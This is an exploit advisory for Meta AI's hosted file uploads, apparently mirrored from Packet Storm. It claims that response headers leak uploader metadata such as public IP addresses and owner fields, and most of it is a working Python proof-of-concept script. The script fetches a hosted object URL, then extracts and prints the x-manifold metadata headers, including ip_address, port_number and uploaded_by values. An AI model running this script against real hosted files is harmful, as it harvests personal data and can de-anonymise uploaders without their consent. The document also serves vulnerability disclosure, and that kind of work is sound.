Share
## https://sploitus.com/exploit?id=PACKETSTORM:222968
==================================================================================================================================
| # Title : Meta AI Disclosing sensitive metadata through hosting uploaded files |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://www.meta.ai/ |
==================================================================================================================================
[+] Summary : Publicly accessible hosted files generated through the upload workflow expose unsanitized object metadata through response headers.
The exposed metadata contains uploader-associated information including public IP addresses and additional internal object properties.
The issue allows anyone with access to the hosted URL to retrieve sensitive metadata without authentication.
[+] POC :
#!/usr/bin/env python3
import requests
import json
import argparse
from urllib.parse import urlparse
INTERESTING_HEADERS = [
"content-type",
"etag",
"cache-control",
"x-manifold-obj-blobsizebytes",
"x-manifold-obj-canonicalpath",
"x-manifold-obj-ctime",
"x-manifold-obj-propertiesjson",
]
MAX_PREVIEW = 5000
def analyze(url):
print(f"\n[+] Target: {url}")
try:
r = requests.get(
url,
allow_redirects=True,
timeout=20,
headers={
"User-Agent": "Metadata-Analyzer/3.0"
}
)
except Exception as e:
print("[-] Request failed:", e)
return
print("\n=== Response ===")
print("Status :", r.status_code)
print("Host :", urlparse(r.url).netloc)
print("\n=== Interesting Headers ===")
for h in INTERESTING_HEADERS:
value = r.headers.get(h)
if value:
print(f"{h}: {value}")
props = r.headers.get(
"x-manifold-obj-propertiesjson"
)
parsed = {}
if props:
try:
parsed = json.loads(props)
except Exception:
pass
if parsed:
print("\n=== Parsed Metadata ===")
for key in [
"file_name",
"owner",
"uploaded_by",
"ip_address",
"port_number",
"X-Manifold-Obj-ContentType"
]:
if key in parsed:
print(f"{key}: {parsed[key]}")
content_type = (
r.headers.get("content-type", "")
.lower()
.split(";")[0]
.strip()
)
print("\n=== Content Analysis ===")
print("Detected Content-Type:", content_type)
print("Body Length:", len(r.content), "bytes")
if (
content_type.startswith("text/")
or content_type in [
"application/json",
"application/xml"
]
):
print("\n=== File Content Preview ===")
try:
text = r.text
if len(text) > MAX_PREVIEW:
print(
text[:MAX_PREVIEW]
)
print(
f"\n[truncated at {MAX_PREVIEW} chars]"
)
else:
print(text)
except UnicodeDecodeError:
try:
print(
r.content.decode(
"utf-8",
errors="replace"
)[:MAX_PREVIEW]
)
except Exception as e:
print(
"Decode error:",
e
)
else:
print(
"[i] Non-text content, preview skipped"
)
print("\n[+] Done")
def main():
parser = argparse.ArgumentParser()
parser.add_argument(
"url",
help="CDN object URL"
)
args = parser.parse_args()
analyze(args.url)
if __name__ == "__main__":
main()
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================